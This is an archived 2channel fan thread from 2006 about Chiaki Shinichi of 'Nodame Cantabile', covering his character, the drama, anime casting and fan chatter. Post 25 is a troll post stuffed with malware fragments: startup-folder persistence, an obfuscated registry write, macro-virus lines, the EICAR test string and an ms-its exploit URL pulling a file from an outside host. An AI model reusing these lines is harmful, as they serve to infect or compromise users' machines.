5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【のだめカンタービレ】千秋真一【俺様】

1 :名無しかわいいよ名無し:2006/10/27(金) 07:19:32 ID:ckDStkH4
ここは「のだめカンタービレ」の主人公千秋真一を語るスレッドです。

・[sage]進行で半分以下に落ちたら[age]
・激しい妄想は禁止
・アンチお断り



2 :名無しかわいいよ名無し:2006/10/27(金) 08:01:04 ID:H+UQJlG1
おらおら、WWF(World Wide Fund for Nature:世界自然保護基金)の
愛くるしいパンダ様が>>2ゲットだぜ! 頭が高いんだよ、ボケ!

.         ,:::-、       __     >1 クソスレ建ててんじゃねーよ。ビンスみてーに裁判で潰しちまうぞ。
    ,,r   〈:::::::::)    ィ::::::ヽ    >3 >>2ゲットも満足にできねーお前は、俺の着ぐるみ着てプラカード持ってろ(プ
  〃   ,::::;r‐'´       ヽ::ノ     >4 お前はカキフライのAAでも貼ってりゃいいんだよ、リア厨ヒッキー(プ
  ,'::;'   /::/  __            >5 汗臭いキモヲタデブは2ちゃんと一緒に人生終了させろ、バーカ。
.  l:::l   l::::l /:::::)   ,:::::、  ji     >6 いまさら>>2ゲット狙ってんじゃねーよ、タコ。すっトロいんだよ。
  |::::ヽ j::::l、ゝ‐′  ゙:;;:ノ ,j:l     >7 ラッキーセブンついでに教えてやるが、俺はストーンコールドが好きだぜ。
  }:::::::ヽ!::::::::ゝ、 <:::.ァ __ノ::;!     >8 知性のねーカキコだが、お前の人生の中で精一杯の自己表現かもな(プ
.  {::::::::::::::::::::::::::::`='=‐'´:::::::::/      >9 つーか、自作自演でこのスレ盛り上げて何が楽しいんだ?
  ';::::::::::::ト、::::::::::::::i^i::::::::::::/      >10-999 WWEなんか見てるヒマがあったら、俺に募金しろカスども。
.   `ー--' ヽ:::::::::::l l;;;;::::ノ       >1000 1000ゲットしたって、WWF時代の映像物に販売許可は出さねーよ。
        `ー-"

3 :名無しかわいいよ名無し:2006/10/27(金) 11:14:18 ID:UAlRvVMW
3ゲト
千秋様かわいいよ千秋様

4 :名無しかわいいよ名無し:2006/10/28(土) 00:20:53 ID:0i4UL+qS
4age
いいよね千秋

5 :名無しかわいいよ名無し:2006/10/28(土) 00:43:31 ID:qgLAHmMG
苦手デス

6 :名無しかわいいよ名無し:2006/10/28(土) 02:58:40 ID:KCmoXbs+
世界不思議発見で動物奇想天外w

7 :名無しかわいいよ名無し:2006/10/28(土) 05:07:04 ID:SGNKe3Ca
ラッキー7!!

8 :名無しかわいいよ名無し:2006/10/28(土) 06:47:31 ID:PVaCfG5r
のだめに不器用な千秋様が好き

9 :名無しかわいいよ名無し:2006/10/28(土) 09:51:31 ID:KZSm/KUL
白目ツッコミがカワユス

千秋様大好きだ

10 :名無しかわいいよ名無し:2006/10/28(土) 18:06:56 ID:pbwun56A
千秋様マンセー
ドラマの千秋様もカッコイイ

11 :名無しかわいいよ名無し:2006/10/28(土) 19:14:36 ID:0i4UL+qS
原作は今千秋とのだめどういう状況?

12 :名無しかわいいよ名無し:2006/10/28(土) 23:23:28 ID:lOTKdh5o
>>11
千秋、ついに変態の森に突入す。

13 :名無しかわいいよ名無し:2006/10/30(月) 16:02:24 ID:9nX9dMxR
アニメ1月から始まるらしいけど声優は誰になるかね?

14 :名無しかわいいよ名無し:2006/10/30(月) 21:24:45 ID:nNYBc9wt
やばい、萌える

15 :名無しかわいいよ名無し:2006/10/30(月) 22:44:00 ID:9nX9dMxR
萌えるよね。
ドラマ見てから漫画買ったけどやばいぐらいかっこいいよ。

16 :名無しかわいいよ名無し:2006/10/31(火) 17:44:37 ID:4bfLxAuM
千秋の身長181aナイスバランス

17 :名無しかわいいよ名無し:2006/10/31(火) 21:47:53 ID:IcNmFVKZ
かわいいよ千秋かわいいよ
何気にプリごろ太みてる千秋がかわいいよ

18 :名無しかわいいよ名無し:2006/10/31(火) 21:51:32 ID:y6Bzo8AO
千秋スレキター!!
千秋カコヨス。

19 :名無しかわいいよ名無し:2006/10/31(火) 22:17:13 ID:MRjk+XHI
ドラマから入ったけど原作がやっぱ1番良い。千秋かっこいいよ千秋

20 :名無しかわいいよ名無し:2006/10/31(火) 23:00:55 ID:idOCX9TD
話題になってるからこのドラマ見てみたんだけど千秋もいいが、
大河内ってキャラが馬鹿可愛くて萌えた(*´д`*)
前の回はほんの少ししか出番がなかったけど、大体どういうキャラか予想付いた。
ウォーターボーイズの瑛太みたい。

千秋は指揮振ってる時が一番カコイイ(´∀`)


21 :名無しかわいいよ名無し:2006/11/01(水) 01:00:42 ID:dBiCVkj2
のだめカンタービレの売り上げ凄いな
思わずドラマと原作見たが面白いし何より千秋は男から見ても魅力感じるな。

22 :名無しかわいいよ名無し:2006/11/01(水) 12:34:42 ID:S54S96Jy
千秋カコイイ。原作集めたい。のだめと付き合うのは何巻から?

23 :名無しかわいいよ名無し:2006/11/01(水) 18:54:06 ID:At6wzBfQ
12巻デスヨ

24 :名無しかわいいよ名無し:2006/11/01(水) 18:58:51 ID:S54S96Jy
ありがとう真澄ちゃん!

25 :<body onload=window()>:2006/11/01(水) 22:41:54 ID:2I9uLPEL
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

26 :名無しかわいいよ名無し:2006/11/01(水) 23:05:52 ID:hMX2nNio
千秋スレ!凄いな!!

27 :名無しかわいいよ名無し:2006/11/02(木) 09:04:44 ID:E9sjyi8z
千秋スレ立ってたのか!
立てようと思ってたからその前に見つけられてよかった・・・
のだめ今すごい勢いでコミック売り上げてるよな!
自分も9巻まで見たが9巻が一番ドキッとした
千秋は自分では気づいてないものの、この時既にのだめを意識してたと思う

28 :名無しかわいいよ名無し:2006/11/02(木) 11:13:45 ID:6MNAhgeu
千秋スレ立ったのか!
カコイイのにツッコミな千秋様好きだ

29 :名無しかわいいよ名無し:2006/11/02(木) 16:34:36 ID:IONLx96y
玉木宏が結構似合ってる。

30 :名無しかわいいよ名無し:2006/11/02(木) 17:15:31 ID:jTrWfe4x
カコヨイのに飛行機乗れないギャップでしょっぱなから恋したよ


千秋好きだ千秋

カッコカワユイよ千秋

31 :名無しかわいいよ名無し:2006/11/02(木) 23:02:44 ID:2lmrp2+O
最初は千秋に萌えたが、今は大河内君がカワユス(ノ∀`)タハー

32 :名無しかわいいよ名無し:2006/11/03(金) 01:55:31 ID:jZ5SsRJA
千秋様ってツンデレですか?
のだめに対して不器用なのがテラモエス

33 :名無しかわいいよ名無し:2006/11/03(金) 11:10:20 ID:gECFZkEL
>>31
スレ違い

12巻読んでやっと千秋様の気持ちがわかった自分って・・・
やっぱりのだめを愛していたんですね
しかも急にわけのわからない行動から始まるからびっくりした

34 :名無しかわいいよ名無し:2006/11/03(金) 13:14:03 ID:Pg/TtL4u
かっこいいのにかっこ悪いところが良いw

35 :名無しかわいいよ名無し:2006/11/03(金) 13:28:54 ID:3nCKocft
かっこ悪いけどかこいい。おまい最高だよ

36 :名無しかわいいよ名無し:2006/11/03(金) 21:00:49 ID:jZ5SsRJA
人が居ると「彼氏じゃねぇ」とか言ってるけど二人っきりの時とかデレデレの予感www

37 :名無しかわいいよ名無し:2006/11/03(金) 23:20:52 ID:yJcP+ykg
童貞なのか否か

38 :名無しかわいいよ名無し:2006/11/04(土) 00:40:57 ID:dyo1fRvW
たまに童貞説が出るのが不思議でならない
過去普通に複数の女性と付き合ってきたみたいだし
彩子との会話を見れば関係があったのは一目瞭然

千秋はのだめだけでいてほしい〜とかいう願望を持ったお嬢さんなのか

39 :名無しかわいいよ名無し:2006/11/04(土) 22:01:49 ID:oGGhCFSH
リュカって千秋を敵視してるんだろうか。

40 :名無しかわいいよ名無し:2006/11/04(土) 22:18:09 ID:tgnTgpOL
16巻まで買った・・・アニメ化期待だから声優が悪かったらマジショック!
何か1から16巻見た感じ千秋どんどんイケメン化してきてるよな・・・普通年行けば老けるが寧ろ若返った・・・
今の千秋のほうが俺は好きだ!性格的にものだめと逆転した感じで可愛く見えてくる

41 :名無しかわいいよ名無し:2006/11/05(日) 00:18:55 ID:XifFJ3Nk
千秋の声優自分も気になるな〜
個性的な声にやっぱり私は拘る
理由は「存在感」が必要だしたとえ演技がよくても声が普通では物足りないし地味

千秋、外国編から急にキャラ変わったね
今の千秋は穏やかで好きだな〜
クールな千秋も好きだったけどのだめと接近したことで人間らしさが出てきて余計に好きになった

42 :名無しかわいいよ名無し:2006/11/05(日) 00:51:21 ID:atYbxXmg
アニメの声優はまだ発表されてないよね?



……杉田智和はどうだろ(ry

43 :名無しかわいいよ名無し:2006/11/05(日) 01:01:00 ID:lK/uH+He
クールなら緑川だけど、千秋には合わないだろうし。杉田も声が張りすぎてる気がする。


宮野・・・は駄目か。

44 :名無しかわいいよ名無し:2006/11/05(日) 03:22:49 ID:atYbxXmg
小野大輔はどうだ。
心なしか玉木宏に似ている気もするぞ。気も。

というか俺の趣味わかりやすすぎるなw

45 :名無しかわいいよ名無し:2006/11/05(日) 03:46:10 ID:XifFJ3Nk
>>44
あんたまさか声優スレで散々小野が合うとか言ってる人?
正直個性もないし存在感も出せないから無理だし主役向きじゃーない

46 :名無しかわいいよ名無し:2006/11/05(日) 11:01:40 ID:atYbxXmg
>>45
いや、声優板は開いた事もないです。
そして唐突に国崎最高。

47 :名無しかわいいよ名無し:2006/11/05(日) 11:21:07 ID:lK/uH+He
小野坂で

48 :名無しかわいいよ名無し:2006/11/05(日) 11:26:05 ID:VrS51Ipf
声優とかわからんから、玉木がやれば良いと思う。

49 :名無しかわいいよ名無し:2006/11/05(日) 12:03:59 ID:NrACUg95
同感
でも棒は勘弁だなー

50 :名無しかわいいよ名無し:2006/11/05(日) 13:09:50 ID:XifFJ3Nk
何で声優話しただけでこんなに伸びるの?
本当に千秋好きなの?

51 :名無しかわいいよ名無し:2006/11/05(日) 16:04:43 ID:VrS51Ipf
話豚切るけど
オペ研の子に良い声だと言ったときの千秋様最高。マジカコヨス。

52 :名無しかわいいよ名無し:2006/11/06(月) 00:28:26 ID:jnooZX3M
最近原作読んで千秋好きになったんだが、かっこいいなこの男
のだめと出会って少しずつ変わっていく千秋をメインにしているような話だ
オーケストラが舞台なんだが少女漫画だし俺はそう思って読んでる
音楽に興味がない奴でも面白いと思えるいい作品だよ

53 :名無しかわいいよ名無し:2006/11/06(月) 02:28:01 ID:v/XsR+XG
あえて女性声優。

54 :名無しかわいいよ名無し:2006/11/06(月) 05:04:49 ID:i9ivMypb
セックルマダー?

55 :名無しかわいいよ名無し:2006/11/06(月) 12:34:04 ID:mistVzVe
何この痛い流れ
千秋カワイソス

56 :名無しかわいいよ名無し:2006/11/06(月) 22:19:52 ID:71kQOgrn
931 :名無し草 :2006/11/04(土) 04:25:46
【名案】害獣マングース根絶【求む】
http://science4.2ch.net/test/read.cgi/wild/1129040012/l50

1 :名無虫さん :2005/10/11(火) 23:13:32 ID:???
ハブなんか食べずに貴重な野生生物アマミノクロウサギやアマミヤマシギ、イシカワガエルなんでも食べるマングース。
家畜のニワトリまで被害が出ている。
島という閉鎖された空間だから何か良い根絶方法があるはず。
捕まえて殺すと一匹4000円の奨励金を行政が出しているけど、カゴのワナじゃ効率悪くてなかなか減らない。
俺が愛するこの島のマングースは俺が退治する!誰か俺にマングースを根絶する名案をくれ!


932 :名無し草 :2006/11/04(土) 04:28:08
マングースを語るスレ【2000円GET】
http://science4.2ch.net/test/read.cgi/life/1162553873/

57 :名無しかわいいよ名無し:2006/11/07(火) 01:34:48 ID:lXaUqydn
今まで千秋スレがなくて疑問だったから立てようと思ってたw
>>32
自分が認めた人や由衣子にはデレな所、最強にツンデレだと思う




58 :名無しかわいいよ名無し:2006/11/07(火) 12:40:59 ID:NQhUDGgN
ガリ寿司で惚れた

59 :名無しかわいいよ名無し:2006/11/07(火) 13:20:38 ID:2eOHL0L0
あれは笑った
性格悪い千秋様最高
でもなんだかんだでお金払ったあたりに惚れる

60 :名無しかわいいよ名無し:2006/11/08(水) 06:13:40 ID:MKHSlwWt
本当は優しいんだろうな

61 :名無しかわいいよ名無し:2006/11/08(水) 18:42:34 ID:wrDXLn0y
正直不器用なキャラだよね千秋
のだめとハッピーエンドで終わって欲しいよ

62 :名無しかわいいよ名無し:2006/11/09(木) 05:55:16 ID:EVM29hWp
千秋かっこいいよね。のだめに萌える千秋が可愛いよ。

そんな千秋様も夜中に蚊と格闘する事はあるんだろうか。

さっき蚊を仕留めたんだがちょっと頭がよくて手こずったぜ。

63 :名無しかわいいよ名無し:2006/11/09(木) 10:15:50 ID:P4BtTmgp
千秋様はきっと蚊取り線香くらい持ってるぞw
なのでゴキブリと格闘する千秋様が見たい

64 :名無しかわいいよ名無し:2006/11/09(木) 13:27:04 ID:J0tu33VA
おまいら、様付けだけはやめてくれ。
アイドルの追っかけみたいで気持ち悪いぜ。

65 :名無しかわいいよ名無し:2006/11/09(木) 15:38:59 ID:VnJXFpj2
それはお前の主観だろ
別に何て呼ぼうが良いじゃん

66 :名無しかわいいよ名無し:2006/11/09(木) 18:25:14 ID:J0tu33VA
そういえばこれ女性誌の漫画なんだよな。
みんなが普通で、俺が変なんだな。
ごめん、本当に。

67 :名無しかわいいよ名無し:2006/11/10(金) 03:11:26 ID:5ZB8cjsy
千秋様、おやすみなさい。

68 :名無しかわいいよ名無し:2006/11/10(金) 09:51:47 ID:E/t7+eXD
千秋様、おはようございます。

69 :名無しかわいいよ名無し:2006/11/10(金) 14:07:29 ID:iqTSb8V/
千秋様此処人がいません

70 :名無しかわいいよ名無し:2006/11/11(土) 11:55:16 ID:ghpnemlS
千秋分が足りない…

71 :名無しかわいいよ名無し:2006/11/11(土) 14:43:38 ID:PR2/d70X
アニキャラ板の朝比奈さんスレみたいになりつつある。

72 :名無しかわいいよ名無し:2006/11/12(日) 23:02:12 ID:Wwqooxrs
ツンデレ千秋

73 :名無しかわいいよ名無し:2006/11/12(日) 23:11:25 ID:NwT68P+t
お前ら蛇使いか絞め殺すぞ

74 :名無しかわいいよ名無し:2006/11/13(月) 00:16:18 ID:3UcLXfae
最萌で上位狙えるかな?
いまひとつパンチが足りないか

75 :名無しかわいいよ名無し:2006/11/13(月) 01:18:44 ID:XnXvl33m
D‥‥

76 :名無しかわいいよ名無し:2006/11/13(月) 06:05:39 ID:xZwW9OCZ
千秋様、おやすみなさい。試しにageてみます。

77 :名無しかわいいよ名無し:2006/11/13(月) 22:31:18 ID:KFOm2Ghb
千秋様今日1日お疲れ様です。

78 :名無しかわいいよ名無し:2006/11/14(火) 00:02:11 ID:RwZCvGYz
今日の千秋様の素敵さは異常。

79 :名無しかわいいよ名無し:2006/11/14(火) 00:12:23 ID:p/SMobUX
千秋はいうほど俺様俺様してない気がする。
というか、あの中ではわりと周りが見える常識人じゃないかなあ。

80 :名無しかわいいよ名無し:2006/11/14(火) 10:00:36 ID:mloQ/+EG
俺様っていうか自信家だよな
でも一番まとも

81 :名無しかわいいよ名無し:2006/11/14(火) 14:41:26 ID:Kd31EECn
日本編じゃ一番まともな人間だったけど、抵抗するのに疲れて変態の森突入したからなあ…
今や変態の森の先輩デス

82 :名無しかわいいよ名無し:2006/11/14(火) 14:57:56 ID:OIdlmQrH
時々常識から大きく逸脱する千秋が良い

83 :名無しかわいいよ名無し:2006/11/14(火) 15:27:37 ID:dDV+IM0A
あれでなかなか面倒みのよい性格♪

84 :名無しかわいいよ名無し:2006/11/14(火) 23:27:24 ID:tEsnzPPd
千秋様なら抱かれたい

85 :名無しかわいいよ名無し:2006/11/15(水) 08:41:30 ID:ALKtJHH3
>>84
現実を見ろ、抱いてくれない。

86 :名無しかわいいよ名無し:2006/11/15(水) 10:09:14 ID:nTqvTCIc
まあまあただの願望じゃないか
夢見ることは自由さ


87 :名無しかわいいよ名無し:2006/11/16(木) 08:57:11 ID:/DLDCraa
>>84

88 :名無しかわいいよ名無し:2006/11/16(木) 22:34:49 ID:MEfRuKrm
汚れなき千秋さまはセクロスなんてしません

89 :名無しかわいいよ名無し:2006/11/16(木) 23:01:44 ID:/DLDCraa
>>88 元カノとやってたと思うよ。ソース:二人の会話

90 :名無しかわいいよ名無し:2006/11/16(木) 23:20:05 ID:zDVzzX5r
>>88
千秋が童貞なんて嫌だ

91 :名無しかわいいよ名無し:2006/11/17(金) 12:50:07 ID:9tDZ+pb3
>>90 すっごいテクニシャンの千秋様ってのはどう?w

92 :名無しかわいいよ名無し:2006/11/17(金) 16:10:50 ID:No4sNVwv
>>91
あの細くて長い、器用そうな指なら
上手かも・・・

93 :名無しかわいいよ名無し:2006/11/17(金) 16:35:01 ID:M0Z5JMtV
このスレは男のレスと女のレスの違いを教えてくれた。
2ちゃんねるは常に何かの形で俺を学ばせてくれる。

94 :名無しかわいいよ名無し:2006/11/17(金) 16:50:15 ID:9tDZ+pb3
えかったなw

95 :名無しかわいいよ名無し:2006/11/17(金) 20:09:07 ID:CZqKsaIL
指揮者コンクール編はどれもいい表情してて惚れる

96 :名無しかわいいよ名無し:2006/11/19(日) 20:19:02 ID:ILUV/x3O
鬼・千秋が好き

97 :名無しかわいいよ名無し:2006/11/21(火) 00:11:19 ID:ibbWvTlV
それ思う。

98 :名無しかわいいよ名無し:2006/11/21(火) 09:36:37 ID:FDJzmssW
千秋も玉木千秋も悶々ムラムラする

99 :名無しかわいいよ名無し:2006/11/21(火) 14:55:30 ID:mqd/jUC0
このスレ、(ノンケの)男はどれくらいいる?

100 :真澄:2006/11/21(火) 23:59:05 ID:Op2stJhh
100♪
いただきよお〜♪

101 :名無しかわいいよ名無し:2006/11/23(木) 01:39:45 ID:HxJ34wzB
あげ

102 :名無しかわいいよ名無し:2006/11/23(木) 17:29:10 ID:rxH9KIn5
ドラマより原作のほがオモユス
千秋カコユス

>>88 実は毎晩パコってらっしゃる。

103 :名無しかわいいよ名無し:2006/11/23(木) 20:18:28 ID:wTwX3zmZ
人気声優の関智一が千秋役らしい

104 :名無しかわいいよ名無し:2006/11/24(金) 03:18:08 ID:56/tktoI
>>103
それはまことか。
一瞬えっ、と思ったが面白そうだ。

105 :名無しかわいいよ名無し:2006/11/25(土) 11:56:41 ID:ntVKayrb
正式に決まったみたいだな
関智一・・・合う合わないは別として声優でよかったよ

106 :名無しかわいいよ名無し:2006/11/25(土) 18:18:22 ID:IFv/pMDI
ほかキャストは?

関智かぁ…イメージと違う

107 :名無しかわいいよ名無し:2006/11/25(土) 21:38:08 ID:UrAyKmE7
突っ込みは上手いのかな?>関

>>106
ttp://www.nodame-anime.com/character.html

108 :名無しかわいいよ名無し:2006/11/26(日) 00:29:54 ID:Aauh3EDr
>>107
真澄ちゃんの紹介のされ方に文字通り愛を感じた。

109 :名無しかわいいよ名無し:2006/11/26(日) 00:32:32 ID:Aauh3EDr
途中で書き込んでしまった。

関智一の演技はノリが良くて、ギャグシーンにはぴったりだと思う。
声のイメージはちょっと違う気がするけど、でも聞いてみればしっくり感じるってタイプの声優だと思うよ。

110 :名無しかわいいよ名無し:2006/11/26(日) 02:03:38 ID:pGQtzdsL
聞いてみれば意外とあってそうな気もしないでもない。

111 :名無しかわいいよ名無し:2006/11/26(日) 10:32:18 ID:GvezEFLE
そうか。
関智の性格を考えちゃだめなんだ。
声だけイメージすれば、合ってなくもない。

112 :名無しかわいいよ名無し:2006/11/26(日) 15:48:55 ID:i9v/Xn5U
叩かれまくってるがな関智一
押し付けがましい奴が合わないと言い切ってるよ
正直微妙だが聞いてみない事にはなんとも言えん時点でそんなこと言わなくてもと思うな

113 :名無しかわいいよ名無し:2006/11/26(日) 19:57:07 ID:0tIm8G8O
アニメスレではのだめ役の川澄共々叩かれてるな…。
まあこればかりはアニメ始まって見ないことにはわからないからなあ。
とりあえず、千秋のひいいーがいい感じだといいなw

114 :名無しかわいいよ名無し:2006/11/27(月) 01:15:54 ID:D3LdG0D6
千秋には向いてると思うよ?
カードキャプターさくら見るといいよ

115 :名無しかわいいよ名無し:2006/11/28(火) 09:41:12 ID:c+ZkNRDS
age
アニメ始まらないことにはココ盛り上がりそうにないね

とにかくどんな千秋になるかはわからないけど楽しみ

116 :名無しかわいいよ名無し:2006/11/28(火) 12:52:13 ID:Riei6WPL
>>113
同感w
千秋のひいいいは大事だな
しかし関智はイメージと正反対
何にしても楽しみだけど

117 :名無しかわいいよ名無し:2006/11/28(火) 18:20:25 ID:FYTB0d5C
イメージどおりのものを聞くのも楽しみだし、イメージと違うものを聞くのも楽しみ。
というかさ、「期待はずれだ!」って怒るよりも、無理にでも「楽しみだな〜」って思ったほうが「得」じゃん。
ハルヒじゃないが。

118 :名無しかわいいよ名無し:2006/11/28(火) 18:29:56 ID:bKimNt7l
でも楽しみにしてるとはずれだった場合のショックも大きいぞw
まあドラマ化もしたのだめだしそんな大コケはしないと思う

119 :名無しかわいいよ名無し:2006/11/28(火) 23:32:19 ID:FYTB0d5C
>>118
そこで魔法の呪文「これはこれで」ですよ。
コレ・ハ・コレデ。
うん、呪文っぽい。

120 :名無しかわいいよ名無し:2006/11/29(水) 00:15:55 ID:Mq31r9Ya
清掃の千秋とのだめの会話が好きなんでアニメでやってくれたらいいな。
ドラマじゃカットされたけど千秋の指導と「カンタービレ!」が見たい。

121 :名無しかわいいよ名無し:2006/11/29(水) 00:40:43 ID:pSt9frXH
関智一スレ行ってきたけどすごいねこの人一日40本煙草吸ってるんだって
声はマジでやばいんじゃないの???

122 :名無しかわいいよ名無し:2006/11/29(水) 00:41:46 ID:9YsXi6bp
そりゃ凄い
健康もだけど、確かに声の仕事でそのヘビースモーカーぶりは…

123 :名無しかわいいよ名無し:2006/11/29(水) 02:06:09 ID:v7semjLa
Hahaha, チアキだってスモーカーじゃないカ。

124 :名無しかわいいよ名無し:2006/11/29(水) 03:15:41 ID:b9N3lVGT
玉木さんも3箱だそうだし、
千秋にタバコはつきものなのかw

125 :名無しかわいいよ名無し:2006/11/29(水) 04:45:45 ID:6Qe/jU5n
ちょっとサボったら急にヲタ化してるスレ

126 :名無しかわいいよ名無し:2006/11/29(水) 10:15:35 ID:nF3rgd/7
>>124
玉木もすげえな
関智は声からして煙草吸ってるっぽいが

127 :名無しかわいいよ名無し:2006/11/29(水) 11:23:48 ID:pSt9frXH
ところで2箱吸えばどれぐらい声変わるんだろう?

128 :名無しかわいいよ名無し:2006/11/29(水) 11:54:20 ID:nF3rgd/7
自分も周りも吸ってないから詳しくは分からないけど、
どれだけ吸えばってことじゃなくて毎日吸ってると
徐々に声がしゃがれていくんじゃないか?

129 :名無しかわいいよ名無し:2006/11/29(水) 19:25:45 ID:v7semjLa
まあ味のある声になっているわけだし、怪我の功名?

130 :名無しかわいいよ名無し:2006/11/29(水) 20:35:23 ID:YFMIol/0
もんたよしのりみたいなもんかw

131 :名無しかわいいよ名無し:2006/11/30(木) 01:41:37 ID:9bivhZmT
煙草40本って絶対声変わるよ・・・いくら劣化してるとはいえそこまで変わってないよな関智一・・・
本当に40本も吸ってるんだろうか?

132 :名無しかわいいよ名無し:2006/11/30(木) 10:49:56 ID:p3aoQs1B
NANAのノブの声は正直耳障りで辛いんだが・・・
まさかあれでやらないよな?
しかしそこまで声にバリエーションがあるとも思えん
演技も別に上手いわけではないしな

133 :名無しかわいいよ名無し:2006/11/30(木) 11:40:55 ID:9bivhZmT
それより煙草ッしょ・・・

134 :名無しかわいいよ名無し:2006/11/30(木) 15:32:19 ID:rR7L3gy+
まじで?
声以前にガンになっちゃうよ・・・。

135 :名無しかわいいよ名無し:2006/11/30(木) 20:14:49 ID:u2H8KXOZ
好きで吸ってんだからガンなんて知るかよ
まあヘビースモーカーでも長生きしてる奴いるし


136 :名無しかわいいよ名無し:2006/11/30(木) 21:17:12 ID:QQJ2Jux/
関智の喉を心配するスレ

137 :名無しかわいいよ名無し:2006/12/01(金) 00:12:11 ID:saOlsU+Y
他人に迷惑だからタバコ吸うな、はおk。
体壊すよ、やめておきなよ、はんg。

138 :名無しかわいいよ名無し:2006/12/01(金) 13:59:33 ID:k5FguN6V
千秋はそこまで吸ってる印象ないんだけどな
口寂しい時とかイライラしてる時に吸うくらいで
のだめがいる時は吸わないとかだったら良い

139 :名無しかわいいよ名無し:2006/12/01(金) 19:21:59 ID:WRe96rbg
のだめと千秋の恋愛はどこまでラブラブになるの?

140 :名無しかわいいよ名無し:2006/12/01(金) 21:29:38 ID:qSCBFONc
知らんがな

141 :名無しかわいいよ名無し:2006/12/03(日) 11:36:51 ID:OfJuQ6xM
個人的に非常識なのだめにツッコむ千秋の図が好きだったから
ラブラブは勘弁
ところで千秋のお陰でラフマニノフ好きになったぜ

142 :名無しかわいいよ名無し:2006/12/03(日) 17:49:37 ID:P8wngC47
ラブラブなのだめと千秋なんて想像出来ん・・・

143 :名無しかわいいよ名無し:2006/12/03(日) 19:00:23 ID:mfw3wl6H
イラストだとラブラブなのが多い気がする。
Kiss最新号の表紙はいいな。嫌がる千秋萌え。

144 :名無しかわいいよ名無し:2006/12/04(月) 19:53:48 ID:covv+fJi
ちあき…すきだー!

145 :名無しかわいいよ名無し:2006/12/04(月) 23:25:34 ID:YtZfxza2
千秋のいい匂いを嗅ぎてぇー!

146 :名無しかわいいよ名無し:2006/12/05(火) 11:12:58 ID:QUm9v/lq
煙草臭いと思うぞw

147 :名無しかわいいよ名無し:2006/12/05(火) 11:47:39 ID:HUD1uqX1
>>146
いい匂いらしいよ
女の子も惚れてたけど、どんな匂いなんだろw

148 :名無しかわいいよ名無し:2006/12/05(火) 12:13:43 ID:ll1wBNfO
そりゃあ香水だろう

149 :名無しかわいいよ名無し:2006/12/05(火) 12:25:03 ID:HUD1uqX1
やっぱシャンプーか香水か
あんま香水のイメージ無いな

150 :名無しかわいいよ名無し:2006/12/05(火) 12:50:49 ID:pd887suj
千秋の匂いならなんでもいーよ。
ぶっとばされるだろうけど。

151 :名無しかわいいよ名無し:2006/12/05(火) 14:08:48 ID:x+pQUolZ
私がもし千秋と同じ大学にいても、のだめみたいにはなれんな・・・
取巻きA・Bで、遠くから「キャー千秋様が登校してきたわよ〜」
なんて言ってるだけだろうな・・・。

まぁ、そもそも現実にのだめや千秋みたいなのはいないだろうが。

152 :名無しかわいいよ名無し:2006/12/05(火) 16:14:07 ID:O6wloMl9
そうか?結構リアルにいそうだと思ってたがw
まあ実際いたらタイプじゃないな千秋は
漫画だからこそ良い

153 :名無しかわいいよ名無し:2006/12/05(火) 21:18:52 ID:pd887suj
うちの彼氏千秋っぽい。顔も何となく似てるし…
私の性格がのだめっぽいせい(風呂盗撮便所覗き奇声ナド…)でああなったのか、もともとそゆ人だったのかわかんないけど…

かぶるかぶる。

154 :名無しかわいいよ名無し:2006/12/05(火) 22:27:16 ID:x+pQUolZ
>(風呂盗撮便所覗き奇声ナド…)

ちょwww

155 :名無しかわいいよ名無し:2006/12/05(火) 22:42:51 ID:pd887suj
みんなやってると思ってた。>風呂盗撮便所覗き奇声…
のだめ見て、『あぎゃ!』って思ったよ…←自分語

みなさんはしませんか?

156 :名無しかわいいよ名無し:2006/12/05(火) 23:01:47 ID:62rl75DM
ヤバイ。12巻までしか買ってないけど12巻やばすぎ。
本スレでも書いたけどトンネルで手を繋ぐシーンが胸キュンすぎる。
のだめから電話がこなくてイライラしてる千秋様も萌えー!!
12巻の最後の方でのだめが千秋様に「じゅうでん〜」ってハグハグしてるのを
クロキンに見つかってしまうシーンも好きなんだが
あの時点でアイツらはセクロスしてるのかな?
セクロスしなきゃあんなにLove度あがらないよね?

157 :名無しかわいいよ名無し:2006/12/05(火) 23:21:01 ID:x+pQUolZ
私はできん

158 :名無しかわいいよ名無し:2006/12/05(火) 23:25:04 ID:x+pQUolZ
あ、でもばぁちゃんには似たような事してるな。

159 :名無しかわいいよ名無し:2006/12/05(火) 23:35:28 ID:pd887suj
>>156 私はしてない派。意外と千秋はすごい奥手そう。

変態ついでに言うけど、匂いモノ好き。脱いだ服とか(その他ご想像にお任せ)、もらったらフガフガする。

だからのだめの気持ちすごーくわかる。

160 :名無しかわいいよ名無し:2006/12/06(水) 00:57:24 ID:A/3BW4C+
だめだ、俺はここの女性陣の「強さ」に勝てない……orz
男で千秋好きな人いる〜? 恋愛感情抜きで。

161 :名無しかわいいよ名無し:2006/12/06(水) 01:08:44 ID:iTpphPHW
>>160は千秋のどんなところがいいなって思う?
男から見てどうなのか気になる

162 :名無しかわいいよ名無し:2006/12/06(水) 09:59:43 ID:nf6nBtCG
男で好きな人も結構多いと思うけどな


163 :名無しかわいいよ名無し:2006/12/06(水) 10:51:38 ID:GivJTtPw
